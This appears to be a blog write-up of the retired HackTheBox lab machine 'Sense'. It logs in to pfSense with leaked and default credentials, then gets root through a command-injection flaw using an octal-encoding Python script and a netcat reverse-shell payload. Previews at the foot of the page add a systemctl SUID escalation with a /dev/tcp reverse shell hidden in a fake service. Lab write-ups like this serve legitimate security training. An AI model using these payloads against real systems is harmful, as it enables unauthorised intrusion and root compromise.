Skip to main content

Hackthebox.eu - Sense - Retired - Updated



Recon


I've been using threader3000 for my recon scan on HTB. It does a staged scan, first it does a super quick up/down scan on all TCP ports then it takes the results of that scan and pipes it into a nmap scan. It automatically saves the results of the nmap scan as XML, which I then convert to HTML to make it pretty.




xsltproc ./10.10.10.60/10.10.10.60.xml -o ./sense.html





Just two ports open 80 & 443. It looks like 80 is lighttpd 1.4.35


When I try to browse using the dns name I added in my /etc/hosts


I get this message.



Weird.


First it redirects me to HTTPS, then I get this error message


If I try it by ip address.




We get redirected to https again and this time we get a login page for pfsense.

Which is an open source firewall project.






https://www.pfsense.org/


A quick google search shows the default credentials for this should be


Username: admin

Password: pfsense


But that doesn't work.


Not much to go on now, let's see if there is anything else that might be on the web server by attempting to brute force for other directories and files, using dirb




Dirb found us some new directories, but not much to go forward with


So we still don't have much of anything to go on, let's try scanning with another tool and a different list to see if we can get some different responses. It's always a good idea to try multiple tools, and multiple lists.


This time I used Dirbuster and the list,

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 


I added txt,html,conf,bak,sh to my search options to look for different file types too


And with the different list we did see a couple of new files 



Changelog.txt and system-users.txt


Let's see what the changelog.txt has in it.


https://10.10.10.60/changelog.txt



# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window


2 of 3 vulnerabilities have been patched, well that means there is one that hasn't right? Good news for us.


What about systems-user.txt


https://10.10.10.60/system-users.txt



####Support ticket###

Please create the following user


username: Rohit
password: company defaults



Ok looks like a ticket asking for an account named rohit to be created with the company default password….. 


Now does that mean the company's Sense.htb's default password or the default password for the company that made the software?


We would have no idea what the internal default password for the Sense company might be, we did already find the default password setup by pfsense


Password: pfsense


Let's try logging in with


Username: rohit

Password: pfsense



It worked, lets see if we can figure out a ware to get code execution from this panel somewhere.





Exploit



It took me a while to find a non-metasploit path forward here.


I eventually came across a couple of blogs.


https://spencerdodd.github.io/2018/01/14/pfsense-arbitrary-code-execution/


The first is showing that the rrd graph is vulnerable to RCE because during the sanitation of the user input they neglected to strip out the "|" character which we can use to pipe other commands to. They also said that if you octal encode your payload you can also bypass the sanitaion all together. 


So combining these we can use the pipe to get another execution of a command and if we octal encode our command we can then issue any command we want to.


I then found this site with a POC in python


https://vulners.com/packetstorm/PACKETSTORM:145909


I had trouble getting  the POC to work but I did borrow from its code to create a little encoding python script for me to use.


I

import sys
stager = sys.argv[1]
encoded = ""

print(sys.argv[1])
for c in stager:
 encoded += ("\\" + oct(ord(c)).lstrip("0o"))


exploit_url = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + encoded + "'|sh" 
print(exploit_url)



Which will accept an argument from the command line and octal encode it, then reinsert it into what the finally URL call would be.


I wanted to start with a bit of a POC of my own. I just want to see if I can have sense ping back to my computer.


So first let's start up tcpdump to listen for ICMP on my VPN tunnel interface


sudo tcpdump -i tun0 -n icmp


Then with my little encoder script I named encoder.py


I encoded "Ping -c 4 10.10.14.10"


python3 ./encoder.py "ping -c 4 10.10.14.10"


Which gave me the following output.





ping -c 4 10.10.14.10
https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh



I copied that link into firefox and…..





We got ping back


So we have been able to use the RCE on pfense


So let's try netcat now to get a reverse shell.


First let's set up our listener.

nc -lnvp 5555


Had trouble getting nc to work, I couldn't get a reverse shell back. I'm guessing at this point that nc is restricted somehow or a non-compatible version.


I tried a bunch of different interaction of a reverse shell and finally found one that worked on 

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp



Netcat OpenBsd

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f


So first thing is I modified it to be my VPN IP and port


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



So I piped that though the little encode.py


python3 ./encoder.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



And I got this back as the encoded URL


https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\162\155\40\57\164\155\160\57\146\73\155\153\146\151\146\157\40\57\164\155\160\57\146\73\143\141\164\40\57\164\155\160\57\146\174\57\142\151\156\57\163\150\40\55\151\40\62\76\46\61\174\156\143\40\61\60\56\61\60\56\61\64\56\61\60\40\65\65\65\65\40\76\57\164\155\160\57\146'|sh


And once that was pasted back into firefox



We got our shell as root.


Let's grab those flags and call it a day.





And just for grins and giggles I checked on the nc reverse shell I had problems with in the begining and saw this.


This version of netcat doesn't allow you to pipe to an executable using -e


Unlike most versions of netcat.





Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more